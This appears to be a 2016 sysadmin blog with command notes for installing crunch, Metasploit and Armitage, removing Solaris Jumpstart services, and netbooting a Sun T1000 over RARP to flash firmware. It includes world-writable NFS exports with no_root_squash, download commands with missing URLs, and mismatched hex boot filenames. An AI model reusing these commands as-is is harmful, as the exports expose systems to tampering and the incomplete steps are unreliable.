 wget -O crunch-3.6.tgz  
 tar xvfz crunch-3.6.tgz  
 make install  
 * non-priv  
 cd /opt  
 sudo git clone  
 sudo chown -R `whoami` /opt/metasploit-framework  
 cd metasploit-framework  
 gem install bundler  
 bundle install  
 sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'  
 armitage (metasploit gui)  
 * priv  
 curl -# -o /tmp/armitage.tgz  
 sudo tar -xvzf /tmp/armitage.tgz -C /opt  
 sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage  
 sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver  
 sudo sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage"  
 sudo perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver  
 sudo nano /opt/metasploit-framework/config/database.yml  
  adapter: postgresql  
  database: msf  
  username: msf  
  port: 5432  
  pool: 75  
  timeout: 5  
 sudo sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"  
 source /etc/profile  
 run it  
 * non-priv  

Thursday, October 6, 2016

remove solaris 8 jumpstart services from a solaris 8 jumpstart server

 yucky gross solaris 8 jumpstart server begone!  
 # grep -v "^#" /etc/inetd.conf <- shows what is defined.  
 hashed finger, tftp, &c in /etc/inetd.conf  
 # pkill -HUP inetd  
 bash-2.03# rm /etc/ethers  
 bash-2.03# rm /etc/bootparams  
 bash-2.03# rm -rf /tftpboot  
 bash-2.03# rm -rf /jumpstart  
 # ptree   
 to determine if bootparamd is forked (saw entries in rpcinfo -p)  
 443  /usr/sbin/rpc.bootparamd  
 441  /usr/sbin/in.rarpd -a  
 looked for rarp in /etc/rc2.d ... then all of /etc   
 # find . -type f -exec grep -l "rarp" {} +  
 found it... "*nfs.server"  
 hashed out rarpd & bootparamd lines  
     # If /tftpboot exists become a boot server  
 #    if [ -d /tftpboot ]; then  
 #        /usr/sbin/in.rarpd -a  
 #        /usr/sbin/rpc.bootparamd  
 #    fi  

Monday, October 3, 2016

netboot solaris 10 via ubuntu 14 using RARP

 I did something bad and my Sun T1000 decided to stop booting due to the most 
recent patchset.  
 Luckily ALOM was installed and I could ssh in and see:  
 Cross trap sync timeout: at cpu_sync.xword[1]: 0x1010  
 Flow across the console.  
 This is a firmware issue, as:  
 sc> showhost  
 SPARC-Enterprise-T1000 System Firmware 6.3.10 2007/12/08 15:48  
 Host flash versions:  
   Hypervisor 1.3.4 2007/03/28 06:03  
   OBP 4.25.11 2007/12/07 23:44  
   POST 4.25.11 2007/12/08 00:10   
 The patchset is for 6.4. Of course.  
 Happily, the T1000 lacks an optical drive or any means of connecting one. 
No USB either. Great.  
 The next option was to do a network boot. Oh boy.  
 I didn't feel like messing with my production Solaris systems, so I installed Ubuntu 14 
 with all the prereqs for an old-style Jumpstart server:  
 * TFTP  
 * Bootparamd  
 * NFSv4  
 * RARP  
 * Solaris 10 SPARC DVD (here: /opt/sol-10-u9-sparc.iso)  
 * Solaris Firmware 6.7.13 patch 139435-10 (here: /opt/solaris10.patches/  
 The reason I am using RARP is that my network already 
 has a DHCP server (M$ flavour).  
 RARP (reverse ARP) lets a host obtain its IP address from its MAC address. So, by sending out RARP packets, my 
 Solaris system is able to get an address and not rely on DHCP. Neat? Yeah.  
 My systems for this exercise are:  
 0A6120A6 (IP as hex)  
 # apt-get install rarpd tftpd-hpa bootparamd nfs-kernel-server  
 # vi /etc/default/rarpd  
 Change the last line to match the tftpd-hpa directory and the NIC name:  
 OPTS="-v -b /var/lib/tftpboot/ eth0"  
 iso mount (create the mount point and patch directory first):  
 # mkdir -p /media/solaris10  
 # mkdir -p /opt/solaris10.patches  
 # mount -o loop /opt/sol-10-u9-sparc.iso /media/solaris10/  
 Define a share in NFS for this mount point as this mount will be used to serve 
 the patches. Open the following file:  
 # vi /etc/exports  
 Add the following entries:  
 /media/solaris10/ *(insecure,rw,no_root_squash,no_subtree_check,sync)  
 /opt/solaris10.patches/ *(insecure,rw,no_root_squash,no_subtree_check,sync)  
 # vi /etc/bootparams  
 sunfire root=netboot:/media/solaris10/Solaris_10/Tools/Boot install=netboot:/media/solaris10 boottype=:in  
 per URL: Some explanation for the above: This defines which host gets the specified 
 NFS share. NFS4 uses relative pathnames, but I am not using this, so therefore I’ve 
 specified the absolute path. Note that server: is the hostname of the server running 
 the NFS service and was mentioned in my post earlier as my server is originally named 
 "netboot". The name used is the hostname of your server, substitute it to the correct name.  
 # vi /etc/hosts  
 Add the following entry: hostnix01  
 Create the ethers file:  
 vi /etc/ethers  
 Add the following entry:  
 00:14:4f:e5:f7:9a hostnix01  
 per URL: Replace the MAC address with the MAC of your Sun server. You can change the 
 hostname as well, but needs to be the same everywhere!  
 vi /etc/default/tftpd-hpa  
 Change the TFTP_ADDRESS line to the following:  
 per URL: The configuration of the server is now complete. One last step we need to do is 
 to copy the netboot kernel for the Sun server. This resides on the mounted Solaris 
 install image. By default OpenBoot will look for a kernel using TFTP when using network 
 boot. Based on its IP-address it will look for a matching HEX filename. We can find out 
 which filename that would be by running the following:  
 # printf "%02X%02X%02X%02X" 10 97 32 166  
 This will result in the following (for my IP-address):  
 The above will be the netboot kernel for the Sun server. Place the netboot kernel in place:  
 # cp /media/solaris10/Solaris_10/Tools/Boot/platform/sun4u/inetboot /var/lib/tftpboot/C0A800E6  
 restart the services in order  
 service tftpd-hpa restart  
 service bootparamd restart  
 service nfs-kernel-server restart  
 service rarpd restart  
 # ssh admin@hostnix01-alom (remote management shell)  
 sc> poweron  
 sc> console -f  
 When you see the MAC address, get into OpenBoot:  
 sc> break -y  
 Switch back to console and netboot the kernel  
 sc> console -f  
 ok > boot net:rarp -avs  
 * interactive, verbose, single user mode (does not include install flag)  
 After waiting next to forever...  
 # mkdir /tmp/mount  
 # mount -F nfs /tmp/mount  
 # cd /tmp/mount  
 # unzip  
 # cd 139435-10  
 # ./sysfwdownload /pwd/patch.bin  
 Run patching command via sysfwdownload. If you see:  
 "sysfwdownload: file could not be opened"  
 that means the installer requires the full path; e.g.:  
 # ./sysfwdownload Sun_System_Firmware-6_7_13-SPARC_Enterprise_T1000.bin   
  .......... (10%).......... (20%).......... (30%).......... (41%)..........    
  (51%).......... (61%).......... (71%).......... (82%).......... (92%)........ (100%)   
  Download completed successfully   
  # init 0   
 Now you should be back at the 'ok' prompt. Now on the ALOM:  
 sc> poweroff   
 SC Alert: SC Request to Power Off Host.   
 SC Alert: Host system has shut down.   
 sc> setkeyswitch -y normal   
 sc> flashupdate -s   
 sc> resetsc   
 Your ssh console will be terminated due to a broken pipe.  
 ssh back in and issue:  
 sc> poweron  
 sc> console -f  
 And you're back!  
 SPARC Enterprise T1000, No Keyboard  
 Copyright (c) 1998, 2013, Oracle and/or its affiliates. All rights reserved.  
 OpenBoot 4.30.4.e, 3968 MB memory available, Serial #82179994.  
 Ethernet address 0:14:4f:e5:f7:9a, Host ID: 84e5f79a.  
 Boot device: disk File and args:  
 Loading: /platform/SUNW,SPARC-Enterprise-T1000/boot_archive  
 ramdisk-root hsfs-file-system  
 Loading: /platform/SUNW,SPARC-Enterprise-T1000/kernel/sparcv9/unix  
 SunOS Release 5.10 Version Generic_150400-38 64-bit  
 Copyright (c) 1983, 2016, Oracle and/or its affiliates. All rights reserved.  
 os-io WARNING: failed to resolve 'scsa,probe' driver alias, defaulting to 'nulldriver'  
 WARNING: failed to resolve 'scsa,nodev' driver alias, defaulting to 'nulldriver'  
 Hostname: hostnix01  
 Configuring devices.  
 LDAP NIS domain name is  
 No panics. Yay!   
 sc> showhost  
 SPARC-Enterprise-T1000 System Firmware 6.7.13 2013/09/24 08:10  
 Host flash versions:  
   OBP 4.30.4.e 2013/09/23 16:06  
   Hypervisor 1.7.3.d 2013/09/24 07:19  
   POST 4.30.4.b 2010/07/09 14:25  
 All is as it should be.    

 some of this was lifted from here: